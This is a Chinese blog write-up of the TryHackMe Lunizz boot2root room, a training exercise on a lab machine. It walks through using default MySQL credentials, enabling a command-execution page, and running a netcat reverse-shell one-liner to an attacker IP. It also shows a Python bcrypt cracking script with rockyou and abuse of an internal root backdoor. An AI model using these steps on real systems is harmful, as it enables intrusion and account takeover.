TryHackMe-Lunizz CTF(boot2root)

最新推荐文章于 2024-08-16 15:00:00 发布
最新推荐文章于 2024-08-16 15:00:00 发布
阅读量934 收藏
点赞数
分类专栏: 我的网络安全之旅-TryHackMe 文章标签: TryHackMe linux渗透测试 boot2root web安全 枚举
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54704239/article/details/130444819
版权

Lunizz CTF

端口扫描

循例nmap

在这里插入图片描述

Web枚举

进80,apache默认页面

在这里插入图片描述

gobuster扫一下目录

在这里插入图片描述

/hidden一个文件上传点, 图片上传后无权访问/hidden/uploads/

在这里插入图片描述

/whatever一个假的命令执行点

在这里插入图片描述

/instructions.txt

由 CTF_SCRIPTS_CAVE 制作(不是真实的)

感谢您安装我们的 ctf 脚本

#脚步
- 创建一个 mysql 用户 (runcheck:CTF_*****************me)
- 更改 config.php 文件的必要行

完成后就可以开始使用 ctf 脚本了

#笔记
请不要使用默认凭据(这很危险)<<<<<<<<<------------------------ 阅读此行 请

得到了一组mysql默认凭据,我相信他会使用默认凭据的,尝试登录mysql

在这里插入图片描述

里面有个runornot的库

在这里插入图片描述

除了这些,已经没有其他东西了,也无法读写文件

我注意到房间提起刚刚的假命令执行点,

从runcheck表当中的run字段,根据多年的编程经验,它可能就是一个开关,用于激活命令执行点

update runcheck set run=1;

在这里插入图片描述

成功执行命令,猜测没错

在这里插入图片描述

直接reverse shell payload

mkfifo /tmp/f1;nc 10.14.39.48 8888 < /tmp/f1 | /bin/bash > /tmp/f1

在这里插入图片描述

横向移动 - 1

在根目录发现了adam用户的文件夹proct,里面有个python文件

在这里插入图片描述

查看该文件

在这里插入图片描述

我尝试着爆破,但没成功,发现它加了随机的salt,而下面给出了整个hash,并且包含了那个salt,即前22位,我们可以用rockyou加salt来爆破出明文密码

值得注意的是我们还需要进行base64 encode

import bcrypt
import base64


salt = b'$2b$12$LJ3m4rzPGmuN1U/h0IO55.'
hashs = b'$2b$12$LJ3m4rzPGmuN1U/h0IO55.3h9WhI/A0Rcbchmvk10KWRMWe4me81e'

with open('/usr/share/wordlists/rockyou.txt', 'r') as f:
    passwd_list = f.readlines()

for pwd in passwd_list:
    passwd = pwd.strip()
    b64_pwd = base64.b64encode(passwd.encode('ascii'))
    generated_hash = bcrypt.hashpw(b64_pwd, salt)
    print(f'Cracking...: {passwd}', end='\r')

    if generated_hash == hashs:
        print(f'\n{passwd}')
        break

爆出来

在这里插入图片描述

直接su过去

在这里插入图片描述

横向移动 - 2

在adam家目录下的Dekstop里面有个txt

在这里插入图片描述

打开它,地图所在的位置名字,尝试一番后,将其小写并且去掉空格就是mason的密码

在这里插入图片描述

user flag

在这里插入图片描述

权限提升

通过ss -tlnp发现内网开了个8080,使用ps查看进程是php并且是root

在这里插入图片描述

直接传个socat过去把它转出来

在这里插入图片描述

访问8888端口, 一个backdoor

在这里插入图片描述

使用mason的密码,并且使用passwd的cmdtype进行post请求,发现它似乎直接更改了root的密码为mason的密码

在这里插入图片描述

直接su到root,同时拿到root flag

在这里插入图片描述

Sugobet
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Hack the BTRSys1(Boot2Root Challenge)【VulnHub靶场】渗透测试实战系列1
重新启程
11-25 1297
靶场下载地址:BTRSys: v1 下载完毕之后直接导入到VMWare,看下设置了DHCP,那就在内网网段~~ 接着就打开内网的另外一台攻击机器Kali,首先搜集一下信息,Zenmap开始扫描,其实也就是nmap包装了一个UI界面。 Okay,扫描结果出来了,看下图: 主要提供了下面三个服务端口: vsftd,这个应该版本有点老,可以exploit一下,小本本记下来 ss...
Hack the LAMPSecurity: CTF8 (CTF Challenge)
墙角睡大觉的专栏
07-30 1681
欢迎来到boot2root CTF挑战“LAMPSecurity:CTF8”由madirsh2600上传到vulnhub。因为,有一个主题,你需要获取flag以完成挑战,下载地址。 https://www.vulnhub.com/entry/lampsecurity-ctf8,87/ 根据作者描述,该漏洞靶机环境有很多种技术可以获得root权限。但这中间并没有利用开发/缓冲区溢出。因此,根据我们的...
TryHackMe-Madeye‘s Castle(boot2root
M1n9K1n9的博客
03-27 689
一个boot2root盒子,由Runcode.ninja团队在CuCTF中使用的盒子修改而来祝你冲进麦德耶的城堡玩得开心!在这个房间里,你需要完全枚举系统,站稳脚跟,然后转向几个不同的用户。
TryHackMe-Inferno(boot2root
M1n9K1n9的博客
03-28 603
现实生活中的机器+CTF。该机器被设计为现实生活(也许不是?),非常适合刚开始渗透测试的新手“在我们人生旅程的中途,我发现自己身处一片黑暗的森林中,因为直截了当的道路已经迷失了。我啊!说这森林野蛮、粗犷、严厉,这是多么难说,这在一想到中又让人感到恐惧。机器上有 2 个哈希键(用户 - 本地.txt和根 - 证明.txt),你能找到它们并成为 root 吗?
TryHackMe-Wekor(boot2root
M1n9K1n9的博客
03-24 337
涉及Sqli,WordPress,vhost枚举和识别内部服务的CTF挑战;此 CTF 主要侧重于枚举、更好地理解服务以及对本机某些部分的开箱即用思考。
TryHackMe - Fowsniff CTF靶场
z4yn:)的博客
03-03 424
Fowsniff CTF Hack this machine and get the flag. 0x01 信息收集 先用Nmap工具对目标进行端口服务探测 打开Web服务扫一遍目录没有发现有价值的线索。但分析端口应该突破口为110端口的邮箱服务。 搜索一下名为fowsniff的公司,第一条为推特 点进去能看到有个介绍说这个是靶场的一部分,随后贴了一个pastebin.com的链接。 跟随链接跳转可以访问到一个带有邮箱账号密码的文件 ...
Tryhackme-Simple CTF
个人博客
09-24 233
Simple CTF 文章目录Simple CTFTask1 Task1 1.How many services are running under port 1000? 2.What is running on the higher port? ssh 3.What’s the CVE you’re using against the application? CVE-2019-9053 NVD - CVE-2019-9053 (nist.gov) 4.To what kind of vulne
tryhackme-ctf:TryHackMe CTF的编写,注释,dratfs,拼字游戏,文件和解决方案
05-06
雷达2 ILSpy 电源外壳 破解站 x Shodan 加油站 Dcode.fr Stegsolve 异或 fcrackzip Vim 小便pdf vmonkey tplmap xsrfprobe jwt.io c-jwt-cracker wfuzz kerbrute 拍板 鲁比乌斯 邪恶的温克 uf 敲门...
tryhackme-writeups:我对TryHackMe机器的笔记
03-08
- "ctf-writeups":CTF比赛的总结和分析,通常包括解题思路、解决方案和经验分享。 - "ctf":Capture The Flag,一种网络安全竞赛,选手通过解谜、破解等方式获取“旗帜”得分。 - "writeups":对完成任务或解决问题...
TryHackMe-notes:该存储库包含我对TryHackMe房间的注释和文章(演练和ctf类型)
03-27
TryHackMe撰写该存储库包含我对TryHackMe房间的注释和文章。 什么是TryHackMe? 是一个在线课程,可通过动手练习和实验来学习网络安全
TryHackMe-Notes:TryHackMe Rooms笔记
04-02
3. **学习路径**:按照TryHackMe推荐的学习路径进行,从基础的CTF(Capture The Flag)房间开始,逐步进阶到更复杂的挑战。 4. **笔记记录**:正如标题所示,记笔记是非常重要的。记录你在每个房间中学到的新概念、...
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
怎么在网络攻击中屹立不倒
dexun123的博客
08-12 823
在当今蓬勃发展的网络游戏产业中,服务器安全无疑是企业生存与发展的基石。面对互联网环境中无处不在的DDoS(分布式拒绝服务)与CC(挑战碰撞)攻击威胁,游戏服务器的防御能力与高效处理能力显得尤为重要。相较于追求综合性能平衡的普通服务器,游戏服务器必须专注于构建坚不可摧的安全防线与流畅无阻的游戏体验,以抵御外部侵扰,确保玩家沉浸于无缝的游戏世界。
《密码编码学与网络安全原理与实践》第十一章、第十二章、第十三章 数据完整性算法
m0_57291352的博客
08-13 788
认证函数与保密函数的分离能提供结构上的灵活性(认证与保密可在网络协议的不同层次进行);f函数在每个输入消息块被Hash时执行一次,函数的输入是1600位的状态变量s,将s转换为由64位纵构成的5*5矩阵,然后函数对矩阵执行24圈操作,每一圈包括5个步骤,每个步骤通过置换或代换操作作对状态矩阵进行更新。如果算法使用伪随机函数(PRF)来产生诸如会话密码密钥之类的值,那么要求仅有PRF的使用者知道种子,如果该算法用于产生流密码的加密密钥流,那么种子的作用是仅为发送方和接收方知道的密钥。64]中的四分之一。
BurpSuite
Fab1an的博客
08-13 1077
如果只能用一个Web渗透工具,我选BurpSuite。
网络安全(黑客)自学
最新发布
白帽子凯哥聊黑客
08-16 916
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
文件上传-.htaccess利用
feiwujiushiwo的博客
08-13 448
限于Apache.htaccess文件是服务器中的一个配置文件,它负责相关目录下的网页配置。笼统地说,.htaccess可以帮我们实现包括:文件夹密码保护、用户自动重定向、自定义错误页面、改变你的文件扩展名、封禁特定IP地址的用户、只允许特定IP地址的用户、禁止目录列表,以及使用其他文件作为index文件等一些功能。
靶机:DC-4
weixin_52953960的博客
08-13 328
在 /var/mail 下有一封信,发现 charles 用户的密码。teehee是个小众的linux编辑器,执行以下命令,成功提权。查看 /etc/passwd 文件。sudo -l 看一下,不知道密码。在 jim 用户下发现密码文件。查看具有 root 权限的命令。访问80端口,发现登录页面。切换为交互式shell。使用 hydra 破解。bp抓包,是命令执行。
03-reversing CTF
06-06
03-reversing CTF是一种CTF(Capture The Flag)比赛中的一类,重点考察的是逆向工程技能。CTF比赛中,参赛者需要通过解决一系列的难题,获取旗帜(flag)来得分。在03-reversing CTF中,参赛者需要通过对程序进行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sugobet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值